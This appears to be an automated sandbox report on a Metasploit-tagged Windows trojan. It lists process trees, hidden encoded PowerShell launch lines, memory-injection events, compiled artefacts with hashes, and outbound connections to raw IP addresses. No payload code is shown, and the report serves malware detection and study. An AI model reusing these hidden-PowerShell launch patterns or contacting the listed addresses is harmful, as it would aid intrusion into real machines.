Malware Analysis Report

2024-10-18 21:34

Sample ID 240622-1nqgjavhrc
Target 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118
SHA256 ddb66647189270d6046b6c95e30900f83ffe9911e77a918dd50a6f09879d1624
Tags
metasploit backdoor execution trojan
score
10/10

Analysis Overview

score
10/10

SHA256

ddb66647189270d6046b6c95e30900f83ffe9911e77a918dd50a6f09879d1624

Threat Level: Known bad

The file 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

metasploit backdoor execution trojan

MetaSploit

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-22 21:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-22 21:48

Reported

2024-06-22 21:50

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 720 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 720 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 720 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 1988 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 1988 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 1988 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 5004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 5004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 5004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5004 wrote to memory of 4484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 5004 wrote to memory of 4484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 5004 wrote to memory of 4484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4484 wrote to memory of 4776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4484 wrote to memory of 4776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4484 wrote to memory of 4776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand 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

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand 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

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES414F.tmp" "c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 testme.com udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 72.15.174.6:80 tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/720-0-0x0000000000400000-0x0000000000476000-memory.dmp

memory/3644-1-0x0000000074E7E000-0x0000000074E7F000-memory.dmp

memory/3644-2-0x0000000002ED0000-0x0000000002F06000-memory.dmp

memory/3644-4-0x0000000074E70000-0x0000000075620000-memory.dmp

memory/3644-3-0x0000000005B80000-0x00000000061A8000-memory.dmp

memory/3644-6-0x0000000005970000-0x00000000059D6000-memory.dmp

memory/3644-8-0x0000000074E70000-0x0000000075620000-memory.dmp

memory/3644-5-0x00000000056D0000-0x00000000056F2000-memory.dmp

memory/3644-7-0x0000000005AE0000-0x0000000005B46000-memory.dmp

memory/3644-9-0x00000000061B0000-0x0000000006504000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0rpvq3ti.e51.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3644-19-0x0000000006790000-0x00000000067AE000-memory.dmp

memory/3644-20-0x0000000006830000-0x000000000687C000-memory.dmp

memory/1988-21-0x0000000074E70000-0x0000000075620000-memory.dmp

memory/1988-22-0x0000000074E70000-0x0000000075620000-memory.dmp

memory/1988-32-0x0000000007900000-0x0000000007F7A000-memory.dmp

memory/1988-33-0x0000000006490000-0x00000000064AA000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline

MD5 9b594472d3edd2866e41a9409e174c28
SHA1 fb712249b60038b2d2b4c690acf70a7c78774281
SHA256 962cfab3660f467575af9bd80140232b991b0eb58f8c5ac5cc8e35229376f17c
SHA512 ef277ee443c64be051e9add3a2d2ec818b519223739fababc9806784fb05017e508f4eaf31bfb4bb618a22772048ea358d966302f6095972f3f3466d2901bbaa

\??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.0.cs

MD5 7319070c34daa5f6f2ece2dfc07119ee
SHA1 f26a4a48518a5608e93c8b77368f588b0433973c
SHA256 b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
SHA512 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

\??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP

MD5 7b179e0bbe6cdabcb8adb8846f7ab4e8
SHA1 d7e4dfdf2f378f889f652008abd204c81de3660b
SHA256 5b850be8355ad0509406ad1d3ced0173a62b7dd4c7004437669fd12f1ac3edec
SHA512 ac5143f24ddace9a581653e8ed80bda120f93544a822a16d3a3552e57f9c666c60075d76e4cbff8b4f10199f23375655fa8a5109565edf84a398d7383d310e35

C:\Users\Admin\AppData\Local\Temp\RES414F.tmp

MD5 32301361b323937c28a85c9e3626607b
SHA1 4476c5069156ae769ee91eef123c51204f20468c
SHA256 e3da5c07c50ac0166d7a7391687a256973c6c59e01a2dc147c376bcb3f383aa6
SHA512 5c7cd2b42fed276f134261677fdb3f733e6ae4e45bd9d10a974de93f90440fd75bd93c024e2fe2f4c2bef24f0c032deffb933d62855f9051ebd4d8651c4ef243

memory/5004-55-0x0000000006080000-0x0000000006088000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.dll

MD5 71bbf2f34607364c50420c9db477d25c
SHA1 78febc656937380b72684fa09f74d707d5a669eb
SHA256 d3dcc264749ebcef1489722ddd0a1f72547cde119d091b50c53eec33d8b4a9a5
SHA512 a5d8532c9a8bc43d3d2681e8a96dd67a277d62be5bf90cab9d135132eeccfda570634e803ca87a14fac959e22e1db9559b09841e27387cb72c9ffbc0df4ad139

memory/5004-57-0x0000000006CE0000-0x0000000006CE1000-memory.dmp

memory/3644-59-0x0000000074E7E000-0x0000000074E7F000-memory.dmp

memory/3644-60-0x0000000074E70000-0x0000000075620000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

memory/1988-63-0x0000000074E70000-0x0000000075620000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-22 21:48

Reported

2024-06-22 21:50

Platform

win7-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1708 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2100 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2100 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2100 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2100 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2700 wrote to memory of 2732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2700 wrote to memory of 2732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2700 wrote to memory of 2732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2732 wrote to memory of 2660 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2732 wrote to memory of 2660 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2732 wrote to memory of 2660 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2732 wrote to memory of 2660 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand 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

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand 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

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnlr-kac.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38DD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC38DC.tmp"

Network

Country Destination Domain Proto
US 8.8.8.8:53 testme.com udp
TW 192.72.98.5:80 tcp

Files

memory/1708-0-0x0000000000400000-0x0000000000476000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b6871bb612b0350b771280f6c95b4902
SHA1 68281830cae5ee715ba3d85f46c67db1621f5dcb
SHA256 f5e80d286d077ea62a999e9395b5eb49a3b4fe519100b5db8e2a647b75dabc70
SHA512 096393da0d01cb09e77f196fef9769f1bc7f4618e4c2dfccc7e634e57939df08abb01e04340a99faac7e0b14dd9fa949d54c3a63079c6120aefe59be9fd8e010

\??\c:\Users\Admin\AppData\Local\Temp\gnlr-kac.cmdline

MD5 ac79210adb489947c774aa90662ba787
SHA1 90c90291919bcceb605acc62c9319d720580cac4
SHA256 83ebaec4c4d3cdc7e55736c5958dbec7aeb4da365a4d96a29564d83f55290afb
SHA512 e304e7afaccdd35510a1636403a64832e164072aa2938650e97c9c70189d13ae7245f8f12e736d5fe59e63bf58d69bb8aeb2f2c00a24d173011029e83c2355bb

\??\c:\Users\Admin\AppData\Local\Temp\gnlr-kac.0.cs

MD5 7319070c34daa5f6f2ece2dfc07119ee
SHA1 f26a4a48518a5608e93c8b77368f588b0433973c
SHA256 b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
SHA512 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

\??\c:\Users\Admin\AppData\Local\Temp\CSC38DC.tmp

MD5 f80729650f8f0526c3c5e6c891efee75
SHA1 656d8a58d3bf4ad9298f3bc74097a890dc0bf43e
SHA256 49f6513126f0a42d8152ccf1e58b62c35bcd5c11e6cb58fc07fd8075d4ec1467
SHA512 75df3c9dcf5895b49092d61de08ecb938961407dc347df86ba05f4b5d43c0223f0c16ad050871d2e6891a1a67b1f551b2e93c0fe8bc47e556af1ef2b7ec2cfac

C:\Users\Admin\AppData\Local\Temp\RES38DD.tmp

MD5 bc429cab527bdae7fea6482775b95391
SHA1 3baab5115b94f7d9c065440200464e6af2a84f91
SHA256 5d0162a806205e8661c9fd72a99c3b48af55c0db129c2533cb968daeb9a7948a
SHA512 73bff415e35c1bb42b02897a5ee983922fb66f103e53c381cf3874bf088a35b5a29ad772a297fda4b25453f2025888b89f5fb21645c2d3bc26a05417b00c54fb

C:\Users\Admin\AppData\Local\Temp\gnlr-kac.dll

MD5 8ae45b56a4d40070bff2a57010ca829f
SHA1 07924b4f6fb54b3105d3dfb429bf482cd6609e5a
SHA256 47d84ae418a90f4120511e78492b0477f1085fc18b7419c63edccaec5ce9625a
SHA512 159033634a196cda3df156cc11b52b633610b2a5b2cb753a18728485972afaa6a05ff2c9383112e001ae8cdb9d8ff0fa3282bb44308134f8baaf812dc21a3170

C:\Users\Admin\AppData\Local\Temp\gnlr-kac.pdb

MD5 80deabb48aef123c006aebcafef01f8d
SHA1 ec14a45d86c617b7cb8974c467205265c35d462f
SHA256 e0cf193162ff37f68e42fdc67ef7eac0ab7f1741ee42d308dafd4f1bda33ecad
SHA512 6702e163435ee4561c9c32a4c52be897ab3f0db59659f24bc9fb06d222757c3f14f0e3f3f61be77078a0bdc7270aed7450459794a68d13b89e1dfb8826230dff

memory/2700-28-0x0000000005540000-0x0000000005541000-memory.dmp